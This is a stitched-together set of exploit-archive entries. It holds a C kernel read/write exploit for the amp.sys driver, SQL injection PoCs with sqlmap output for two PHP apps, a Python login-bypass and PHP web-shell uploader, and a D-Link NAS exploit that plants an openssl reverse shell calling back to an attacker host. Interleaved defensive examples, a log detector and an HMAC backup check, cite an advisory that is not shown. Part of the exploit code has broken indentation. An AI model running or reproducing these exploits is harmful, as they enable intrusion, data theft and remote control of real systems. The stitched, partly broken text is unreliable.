*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)0; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToDereference; // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)0; // param4
return (void*)maliciousBuffer;
}
void* CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // function pointer index, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)(maliciousBuffer + 0x40); // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x48); // param4
*(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0; //unknown
*(ULONGLONG*)(maliciousBuffer + 0x48) = 0xffffffff; // param1
return (void*)maliciousBuffer;
}
void* CreateWriteDWORDFromKernelMemoryIOCTLBuffer(void* addressToWriteTo, SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // function pointer index, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToWriteTo; // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x40); // param4
*(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0xffffffff;
return (void*)maliciousBuffer;
}
DWORD leakDWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(addressToLeak, bufferSize);
callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
//address should now be written in kernel memory
void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(bufferSize);
callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
DWORD returnVal = *(DWORD*)((byte*)ReadDWORDFromKernelMemoryLeakIOCTLBuffer + 0x40);
free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
return returnVal;
}
void writeDWORD(void* addressToWrite, void* PDWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(PDWORDToWrite, bufferSize);
callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
//address should now be written in kernel memory
void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateWriteDWORDFromKernelMemoryIOCTLBuffer(addressToWrite,bufferSize);
callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
return;
}
void* leakQWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
    // the primitive reads 32 bits at a time; assemble two reads into one little-endian QWORD
    DWORD firstDWORD = leakDWORD(addressToLeak, deviceHandle, bufferSize);
    DWORD secondDWORD = leakDWORD((byte*)addressToLeak + 0x4, deviceHandle, bufferSize);
    return (void*)(((ULONGLONG)secondDWORD << 32) | (ULONGLONG)firstDWORD);
}
void writeQWORD(void* addressToWrite, void* QWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
writeDWORD(addressToWrite, QWORDToWrite, deviceHandle, bufferSize);
writeDWORD((byte*)addressToWrite + 0x4, ((byte*)QWORDToWrite + 0x4), deviceHandle, bufferSize);
}
int main(int argc, char* argv[])
{
    if (argc < 3) {
        printf("Usage: %s read <hex address> | write <hex address> <hex qword>\n", argv[0]);
        return 1;
    }
    ULONGLONG addressToReadorWrite = strtoull(argv[2], NULL, 16);
    HANDLE deviceHandle = getDeviceHandle((char*)"\\\\.\\AMP");
    if (deviceHandle == INVALID_HANDLE_VALUE) {
        printf("Could not open \\\\.\\AMP (error %lu); is amp.sys loaded?\n", GetLastError());
        return 1;
    }
    SIZE_T size = 0x300;
    if (strcmp(argv[1], "read") == 0) {
        void* leakedQWORD = leakQWORD((void*)addressToReadorWrite, deviceHandle, size);
        printf("Value stored at virtual address %0llx is %0llx\n", addressToReadorWrite, (ULONGLONG)leakedQWORD);
    }
    else if (strcmp(argv[1], "write") == 0) {
        if (argc < 4) {
            printf("write needs a value: write <hex address> <hex qword>\n");
            CloseHandle(deviceHandle);
            return 1;
        }
        ULONGLONG QWORDToWrite = strtoull(argv[3], NULL, 16);
        writeQWORD((void*)addressToReadorWrite, (void*)&QWORDToWrite, deviceHandle, size);
        printf("Wrote %0llx to virtual address %0llx\n", QWORDToWrite, addressToReadorWrite);
    }
    CloseHandle(deviceHandle);
    return 0;
}
# Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi
# Date: 19/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip
# Version: 1.0
# Tested on: Windows, Linux
## Description
A blind SQL injection vulnerability in the "cid" parameter of the class registration page (/php-ycrs/?p=yclasses/registration) in Yoga Class Registration System allows remote unauthenticated attackers to dump the database through arbitrary SQL commands.
## Request PoC
```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
```
This request causes a fatal error in the web app. Appending "'%2b(select*from(select(sleep(20)))a)%2b'" to the "cid" parameter, the response is a 200 OK, but it arrives 20 seconds later, which shows that the injected SLEEP(20) was executed.
```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
```
## Exploit with sqlmap
Save the request from burp to file
```
sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2
---snip---
GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY
---
[16:00:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.2.0
---snip---
```
## The "id" parameter in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" are also vulnerable. It can be exploited in the same way.
# Exploit Title: Human Resources Management System v1.0 - Multiple SQLi
# Date: 16/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0
# Tested on: Windows
## Description
A blind SQL injection vulnerability in the "name" parameter of the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to dump the database through arbitrary SQL commands.
## Request PoC
```
POST /hrm/controller/login.php HTTP/1.1
Host: 192.168.1.103
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.103/hrm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
name=test@testdomain.com'&password=test&submit=Sign+In
```
This request causes an error. Appending "'%2b(select*from(select(sleep(20)))a)%2b'" to the "name" parameter, the response is a 302 Found, but it arrives 20 seconds later, which shows that the injected SLEEP(20) was executed.
```
POST /hrm/controller/login.php HTTP/1.1
Host: 192.168.1.103
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.103/hrm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In
```
## Exploit with sqlmap
Save the request from burp to file
```
┌──(root㉿caesar)-[/home/kali/Workstation/hrm]
└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2
---snip----
[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In
---
[15:49:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.0, Apache 2.4.54, PHP
----snip----
```
## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.
# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# Version: 1.0
# Authentication Required: bypass login with sql injection
#!/usr/bin/python3
import os
import random

import requests

# clear the screen on either platform
os.system("cls" if os.name == "nt" else "clear")

logo = '''
##################################################################
#                                                                #
#   Exploit Script ( Online Diagnostic Lab Management System )   #
#                                                                #
##################################################################
'''
print(logo)

url = str(input("Enter website url : ")).rstrip("/")
# SQL injection in the login form: the OR 1=1 matches the first user row
username = "' OR 1=1-- -"
password = "test"

req = requests.Session()
target = url + "/diagnostic/login.php"
data = {'username': username, 'password': password}
website = req.post(target, data=data)

# web shell that runs whatever is passed in ?cmd=
payload = "<?php system($_GET['cmd']);?>"
with open("rev.php", "w") as files:
    files.write(payload)

hash = random.getrandbits(128)
name_file = str(hash) + ".php"

if "Login Successfully" in website.text:
    print("[+] Login Successfully")
    website_1 = url + "/diagnostic/php_action/createOrder.php"
    # the order form's image upload keeps the client-supplied file name, .php included
    upload_file = {
        "orderDate": (None, ""),
        "clientName": (None, ""),
        "clientContact": (None, ""),
        "productName[]": (None, ""),
        "rateValue[]": (None, ""),
        "quantity[]": (None, ""),
        "totalValue[]": (None, ""),
        "subTotalValue": (None, ""),
        "totalAmountValue": (None, ""),
        "discount": (None, ""),
        "grandTotalValue": (None, ""),
        "gstn": (None, ""),
        "vatValue": (None, ""),
        "paid": (None, ""),
        "dueValue": (None, ""),
        "paymentType": (None, ""),
        "paymentStatus": (None, ""),
        "paymentPlace": (None, ""),
        "productImage": (name_file, open("rev.php", "rb")),
    }
    up = req.post(website_1, files=upload_file)
    print("[+] Check here file shell => " + url + "/diagnostic/assets/myimages/" + name_file)
    print("[+] can exect command here => " + url + "/diagnostic/assets/myimages/" + name_file + "?cmd=whoami")
else:
    print("[-] Check username or password")
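The Bitbucket, Yoga Class, HRMS and Diagnostic Lab entries above each leave a recognisable request in a web server's access log: an archive URL whose prefix carries NUL bytes and git options, a parameter value containing SLEEP(), and a request for a .php file under an image-upload directory followed by ?cmd=. The following detector is an added example written for this page, not code from any of those advisories; the log lines, IPs and file names are constructed. One limitation a defender should keep in mind: access logs do not carry POST bodies, so the HRMS login injection and the upload to createOrder.php are only visible with request-body logging or a WAF, while the GET requests (the Bitbucket archive call, the Yoga "cid" probe, the web-shell invocation) are caught here.

```python
# Added example; not part of any advisory above. A detector run over constructed
# access-log lines for the request shapes these exploits leave on a server:
# the Bitbucket archive option injection, the SLEEP()-based SQL probes against
# the two sourcecodester apps, and a request for a PHP file under an upload
# directory after the Diagnostic Lab web-shell upload. IPs, names and lines are
# made up. Access logs do not carry POST bodies, so the HRMS login injection and
# the upload itself are only visible with request-body logging or a WAF.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common/combined log format: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# git archive option smuggling via NUL-separated "--" arguments in the prefix parameter
BITBUCKET_ARCHIVE_RE = re.compile(r"^/rest/api/[^/]+/projects/[^/]+/repos/[^/]+/archive$")

# the SQL primitives sqlmap and hand probes rely on, matched on decoded parameter values
SQLI_RE = re.compile(
    r"(sleep\s*\(|benchmark\s*\(|union\s+(all\s+)?select|information_schema|"
    r"'\s*(and|or)\s+\d+\s*=\s*\d+)",
    re.I,
)

# server-side script extensions requested from directories meant for uploaded media
UPLOAD_DIR_SCRIPT_RE = re.compile(
    r"/(uploads?|images?|myimages|media|files|attachments)/[^/]+\.(php\d?|phtml|phar)$", re.I
)


def parse_line(line):
    """Dict of the interesting fields, or None for lines in another format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_target(target):
    """Decoded path and [(key, value), ...] query pairs, the way the app would see them."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = parse_qsl(parts.query, keep_blank_values=True)
    return path, query


def classify(path, query):
    """Human-readable findings for one request; empty list means nothing matched."""
    findings = []
    if BITBUCKET_ARCHIVE_RE.match(path):
        for key, value in query:
            if key == "prefix" and ("\x00" in value or "--" in value):
                findings.append("CVE-2022-36804 git option injection in archive prefix")
                break
    for key, value in query:
        if SQLI_RE.search(value):
            findings.append("SQL injection probe in parameter %r" % key)
            break
    if UPLOAD_DIR_SCRIPT_RE.search(path):
        note = "server-side script requested from an upload directory (possible web shell)"
        if any(k in ("cmd", "c", "exec") for k, _ in query):
            note += ", with a command parameter"
        findings.append(note)
    return findings


def scan_log(text):
    """[(ip, target, findings)] for every line that matched at least one rule."""
    results = []
    for line in text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        path, query = decode_target(fields["target"])
        findings = classify(path, query)
        if findings:
            results.append((fields["ip"], fields["target"], findings))
    return results


# Constructed sample: one attack line and one benign line per advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Sep/2022:10:01:02 +0000] "GET /rest/api/latest/projects/PUB/repos/demo/archive?prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1" 500 812
203.0.113.7 - - [23/Sep/2022:10:01:09 +0000] "GET /rest/api/latest/projects/PUB/repos/demo/archive?format=zip HTTP/1.1" 200 48211
198.51.100.4 - - [19/Mar/2023:16:00:01 +0000] "GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1" 200 5120
198.51.100.4 - - [19/Mar/2023:16:00:05 +0000] "GET /php-ycrs/?p=yclasses%2fregistration&cid=2 HTTP/1.1" 200 5120
192.0.2.9 - - [23/Sep/2022:12:30:00 +0000] "POST /diagnostic/php_action/createOrder.php HTTP/1.1" 200 88
192.0.2.9 - - [23/Sep/2022:12:30:03 +0000] "GET /diagnostic/assets/myimages/22940663321536745543.php?cmd=whoami HTTP/1.1" 200 24
"""

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target)
        for finding in findings:
            print("   ", finding)
```

The decode step is the part worth copying: the rules run on percent-decoded values, so "%00" becomes a real NUL and "%2b" a real "+", which is what the vulnerable application saw; matching the raw URL would miss trivially encoded variants.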
# Exploit Title: D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution
# Date: 13.09.2022
# Exploit Author: luka <luka@lukasec.ch>
# Exploit Writeup: https://lukasec.ch/posts/dlink_dnr322.html
# Vendor Homepage: https://dlink.com
# Vendor Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10305
# Software Link: http://legacyfiles.us.dlink.com/DNR-322L/REVA/FIRMWARE
# Version: <= 2.60B15
# Tested on: Debian, Windows 10
"""
# Vulnerability
The configuration backup exported from "Maintenance/System/Configuration Settings" contains the shell script "rc.init.sh", which the device executes at boot. Because the device does not check the integrity of a restored configuration backup, the script can be edited and the backup restored, giving code execution on the next boot.
# Usage
exploit.py [-h] -U USERNAME [-P PASSWORD] -t TARGET -l LHOST -p LPORT
options:
-h, --help show this help message and exit
-U USERNAME, --username USERNAME
Username, ex: admin
-P PASSWORD, --password PASSWORD
Password for the specified user
-t TARGET, --target TARGET
IP of the target, ex: 192.168.99.99
-l LHOST, --lhost LHOST
IP for the reverse shell to connect back to, ex: 123.123.123.123
-p LPORT, --lport LPORT
Port for the reverse shell to connect back to, ex: 8443
"""
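The missing control named in the vulnerability description is an integrity check on the restored archive. The block below is an added example for this page, not D-Link code and not part of the exploit: the backup is signed with an HMAC-SHA256 tag under a key that stays on the device, and a restore refuses any archive whose tag does not verify, so an rc.init.sh edited the way the script below edits it is never written back. The key, file contents and appended reverse-shell line are constructed for the demo.

```python
# Added example, not D-Link code and not part of the advisory above: the integrity
# check the device lacks. The backup archive is signed with an HMAC under a key
# that never leaves the device, and a restore refuses any archive whose tag does
# not verify, so an edited rc.init.sh is never written back. The key, file
# contents and reverse-shell line are constructed for the demo.
import hashlib
import hmac
import io
import tarfile

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes appended after the archive


def build_backup(files):
    """Pack {name: bytes} into an in-memory tar.gz (stand-in for cgi_backup_conf output)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def read_members(archive):
    """{name: bytes} for every regular file in a tar.gz archive (what extractall() yields)."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                out[member.name] = tar.extractfile(member).read()
    return out


def sign_backup(archive, key):
    """archive || HMAC-SHA256(key, archive). The tag covers the compressed bytes as stored."""
    return archive + hmac.new(key, archive, hashlib.sha256).digest()


def verify_backup(blob, key):
    """Return the archive bytes if the trailing tag verifies; raise ValueError otherwise.
    hmac.compare_digest keeps the comparison constant-time."""
    if len(blob) < TAG_LEN:
        raise ValueError("backup too short to carry an integrity tag")
    archive, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, archive, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("backup integrity check failed; refusing to restore")
    return archive


def is_accepted(blob, key):
    """True when a restore of this blob would proceed."""
    try:
        verify_backup(blob, key)
    except ValueError:
        return False
    return True


def restore_demo():
    """(clean accepted?, tampered accepted?) for a backup edited the way the exploit does."""
    key = b"per-device-key-provisioned-at-manufacture"  # constructed; must not be in the backup
    original = {
        "rc.init.sh": b"#!/bin/sh\n/etc/init.d/rcS\n",
        "config.xml": b"<config><hostname>DNR-322L</hostname></config>\n",
    }
    clean = sign_backup(build_backup(original), key)

    # Attacker path from the advisory: unpack, append to rc.init.sh, repack,
    # and re-attach the original tag hoping the device does not check it.
    files = read_members(clean[:-TAG_LEN])
    files["rc.init.sh"] += b"nc 203.0.113.5 8443 -e /bin/sh &\n"  # constructed payload line
    tampered = build_backup(files) + clean[-TAG_LEN:]

    return is_accepted(clean, key), is_accepted(tampered, key)


if __name__ == "__main__":
    clean_ok, tampered_ok = restore_demo()
    print("clean backup accepted:   ", clean_ok)      # True
    print("tampered backup accepted:", tampered_ok)   # False
```

A symmetric tag is only as strong as the secrecy of the key: if it is shared across all units and recoverable from a firmware dump, an attacker simply re-signs the edited archive, so a per-device key in a secure element, or a vendor signature verified with a public key, is the stronger design. Independently of the signature, a configuration restore should write data, not a shell script that runs as root at boot.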
import argparse, socket, requests, base64, urllib.parse, os, shutil, tarfile, random, string
from ipaddress import ip_address

args = argparse.ArgumentParser()
args.add_argument(
    "-U",
    "--username",
    type=str,
    required=True,
    dest="username",
    help="Username, ex: admin",
)
args.add_argument(
    "-P",
    "--password",
    type=str,
    required=False,
    dest="password",
    help="Password for the specified user",
)
args.add_argument(
    "-t",
    "--target",
    type=str,
    required=True,
    dest="target",
    help="IP of the target, ex: 192.168.99.99",
)
args.add_argument(
    "-l",
    "--lhost",
    type=str,
    required=True,
    dest="lhost",
    help="IP for the reverse shell to connect back to, ex: 123.123.123.123",
)
args.add_argument(
    "-p",
    "--lport",
    type=int,
    required=True,
    dest="lport",
    help="Port for the reverse shell to connect back to, ex: 8443",
)
args = args.parse_args()


# base64 + url encode string
# returns string
def b64_url_encode(data):
    enc = data.encode("utf-8")
    encB = base64.b64encode(enc)
    encUrl = urllib.parse.quote(str(encB, "utf-8"))
    return encUrl


# since user input is always unsafe, test IPs
try:
    ip_address(args.target)
except Exception:
    print("[!] Target IP is not a valid IP address")
    exit(1)
try:
    ip_address(args.lhost)
except Exception:
    print("[!] Reverse shell IP is not a valid IP address")
    exit(1)

# check if target is online
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)
    # hardcoded http, change if needed
    s.connect((args.target, 80))
    s.close()
except Exception:
    print("[!] Target is not online")
    exit(1)
print("[+] Target is online")

# login param
authUrl = "http://" + args.target + "/cgi-bin/login_mgr.cgi"
authHeaders = {"content-type": "application/x-www-form-urlencoded"}
authCheckCmd = "cmd=ui_check_wto"
session = requests.Session()

# if no password was given, send an empty pwd field
if not args.password:
    authBody = (
        "cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
        + args.username
        + "&pwd=&ssl_port=443&f_login_type=0&f_url="
    )
else:
    authBody = (
        "cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
        + args.username
        + "&pwd="
        + b64_url_encode(args.password)
        + "&ssl_port=443&f_login_type=0&f_url="
    )

try:
    # login
    reqLogin = session.post(authUrl, headers=authHeaders, data=authBody)
    # check if successful
    reqCheck = session.post(authUrl, headers=authHeaders, data=authCheckCmd)
    if "success" in reqCheck.text:
        print("[+] Login successful")
    else:
        print("[!] Error during login, check credentials")
        exit(1)
except Exception as error:
    print(error)
    print("[!] Error during login, check credentials")
    exit(1)

# download backup
print("[*] Downloading backup")
if os.path.exists("backup_clean"):
    os.remove("backup_clean")

# download param
downloadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
downloadHeaders = {"content-type": "application/x-www-form-urlencoded"}
downloadCmd = "cmd=cgi_backup_conf"
try:
    reqBackup = session.post(downloadUrl, headers=downloadHeaders, data=downloadCmd)
except Exception as error:
    print(error)
    print("[!] Error while downloading backup")
    exit(1)

# saving to disk
try:
    f = open("backup_clean", "wb")
    f.write(reqBackup.content)
    f.close()
    if not os.path.exists("backup_clean"):
        print("[!] Error while saving backup")
        exit(1)
except Exception as error:
    print(error)
    print("[!] Error while saving backup")
    exit(1)
print("[+] Download successful")

# unpack backup (tar.gz file)
try:
    config = tarfile.open("backup_clean")
    config.extractall()
    config.close()
except Exception as error:
    print(error)
    print("[!] Error while unpacking backup")
exit(1)
# inject stuff into startup script
try:
bashscript = open("backup/rc.init.sh", "a")
# revshell with openssl
payload = (
"\n(( sleep 10; rm -f /tmp/lol; mknod /tmp/lol p; cat /tmp/lol | /bin/ash -i 2>&1 | openssl s_client -quiet -connect %s:%s >/tmp/lol & ) & )\n"
% (args.lhost, args.lport)
)
bashscript.write(payload)
# also start a telnet deamon (has same passwd as web)
# bashscript.write("utelnetd -d")
bashscript.close()
except Exception as error:
print(error)
print("[!] Error while creating malicious backup")
exit(1)
print("[+] Created malicious backup")
# re pack file
try:
configInj = tarfile.open("backup_injected", "w:gz")
configInj.add("backup")
configInj.close()
# remove unpacked folder
shutil.rmtree("backup", ignore_errors=False, onerror=None)
except Exception as error:
print(error)
print("[!] Error while re-packing malicious backup")
exit(1)
# upload
print("[*] Uploading malicious backup")
uploadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
uploadHeaders = {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryhellothere"
}
configInj = open("backup_injected", "rb")
tardata = configInj.read().decode("latin-1")
uploadBody = (
'------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="cmd"\r\n\r\ncgi_restore_conf\r\n------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="file"; filename="backup"\r\nContent-Type: application/x-gzip\r\n\r\n'
+ tardata
+ "\r\n------WebKitFormBoundaryhellothere--\r\n"
)
reqUpload = session.post(uploadUrl, headers=uploadHeaders, data=uploadBody)
if "web/dsk_mgr/wait.html" in reqUpload.text:
print("[+] Upload successful, target will reboot now")
else:
print("[!] Error while uploading malicious backup")
exit(1)
# creating listener
print("[*] Started listener, waiting for the shell to connect back")
print("[*] When you are done kill the shell with Ctrl+C")
# random name
randInt = "".join(random.choice(string.ascii_lowercase) for i in range(10))
# generate the cert and the key for the openssl listener
os.system(
'openssl req -x509 -newkey rsa:4096 -keyout /tmp/%s_key.pem -out /tmp/%s_cert.pem -days 365 -nodes -subj "/CN=example.com" 2> /dev/null'
% (randInt, randInt)
)
# create an openssl listener
os.system(
"openssl s_server -quiet -key /tmp/%s_key.pem -cert /tmp/%s_cert.pem -port %s"
% (randInt, randInt, args.lport)
)
exit(0)
